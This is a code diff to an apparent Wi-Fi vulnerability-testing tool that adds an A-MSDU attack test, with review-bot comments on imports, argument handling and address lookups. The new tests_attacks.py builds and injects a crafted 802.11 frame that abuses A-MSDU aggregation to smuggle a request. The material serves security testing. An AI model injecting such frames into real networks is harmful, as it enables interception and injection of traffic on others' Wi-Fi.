diff --git a/research/fragattack.py b/research/fragattack.py index 7e672b156..8fc47d810 100755 --- a/research/fragattack.py +++ b/research/fragattack.py @@ -8,7 +8,9 @@ from wpaspy import Ctrl from scapy.contrib.wpa_eapol import WPA_key from scapy.arch.common import get_if_raw_hwaddr +# FIXME: Import here to avoid loops from tests_qca import * +from tests_attacks import * # ----------------------------------- Utility Commands ----------------------------------- @@ -1491,6 +1493,9 @@ def prepare_tests(opt): elif opt.testname == "qca-rekey": test = QcaDriverRekey() + elif opt.testname == "amsdu-attack": + test = AmsduAttack(REQ_ICMP, stractions == "linux") + # No valid test ID/name was given else: return None diff --git a/research/libwifi b/research/libwifi index a0bfa1be0..69c617809 160000 --- a/research/libwifi +++ b/research/libwifi @@ -1 +1 @@ -Subproject commit a0bfa1be06d2437f92b75fe08266adae0a145e80 +Subproject commit 69c61780992dc66313e194f97958380ffc110643 diff --git a/research/tests_attacks.py b/research/tests_attacks.py new file mode 100644 index 000000000..394c7b73b --- /dev/null +++ b/research/tests_attacks.py 
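Review bot: The added `from tests_attacks import *` in the import block of fragattack.py creates a two-way star import, because tests_attacks.py itself begins with `from fragattack import *`; the new module's class statement therefore runs against a partially initialised `fragattack` module. If `Test` and `Action` are defined below this import line (not visible in the hunk), `class AmsduAttack(Test)` may raise NameError depending on which module is loaded first, and the FIXME shows the placement is already order-sensitive. Moving the shared base classes into a module that both files import, or deferring the import to the branch that needs it with `from tests_attacks import AmsduAttack` inside the `amsdu-attack` case of prepare_tests, would make the load order irrelevant. Star imports in both directions also hide which names each file actually relies on.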
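Review bot: `AmsduAttack(REQ_ICMP, stractions == "linux")` passes the OS switch as an unnamed positional boolean derived from `stractions`, so any value other than the exact string "linux", including a typo or different capitalisation, silently selects the non-Linux frame layout. Passing it by keyword, `test = AmsduAttack(REQ_ICMP, linux=(stractions == "linux"))`, and rejecting unexpected values before constructing the test would make a mistyped option fail loudly instead of producing a misleading test result. prepare_tests starts and ends outside the hunk, so how `stractions` is parsed is not visible here.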
@@ -0,0 +1,38 @@
+from fragattack import *
+
+class AmsduAttack(Test):
+ """
+ Inject a frame identical to the one the station would receive when performing
+ the A-MSDU attack by injecting an IP packet with a specific identification field.
+ """
+
+ def __init__(self, ptype, linux=False):
+ super().__init__([Action(Action.Connected, Action.Inject, enc=True)])
+ self.ptype = ptype
+ self.linux = linux
+
+ def prepare(self, station):
+ log(STATUS, "Generating A-MSDU attack test frame", color="green")
+
+ # Generate the header and payload
+ header, request, self.check_fn = generate_request(station, self.ptype)
+
+ # This checks if the to-DS is set (frame towards the AP) --- XXX Utility function for this?
+ if header.FCfield & 1 != 0:
+ src = station.mac
+ dst = station.get_peermac()
+ else:
+ dst = station.peermac
+ src = station.bss
+
+ # Put the request inside an IP packet
+ if not self.linux:
+ p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="1.2.3.4", id=34)/TCP()
+ else:
+ p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="3.5.1.1")/Raw(b"A" * 768)
+ p = p/create_msdu_subframe(src, dst, request, last=True)
+ p[Dot11QoS].Reserved = 1
+
+ # Schedule transmission of frame
+ self.actions[0].frame = p
+
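Review bot: In `prepare`, the to-DS branch reads the peer address with `station.get_peermac()` while the else branch reads the attribute `station.peermac` directly; if the accessor does anything beyond returning the attribute (not visible here), the two directions will build subframes from different addresses. Using the same accessor in both branches, `dst = station.get_peermac()`, and moving the `header.FCfield & 1` test into the helper that the XXX comment already asks for would remove the divergence. The class docstring should also describe `ptype` and `linux`, and the literals `id=34`, `b"A" * 768` and the fixed IP addresses deserve named constants or a short comment, since a reader cannot tell from this file which of them the result check relies on.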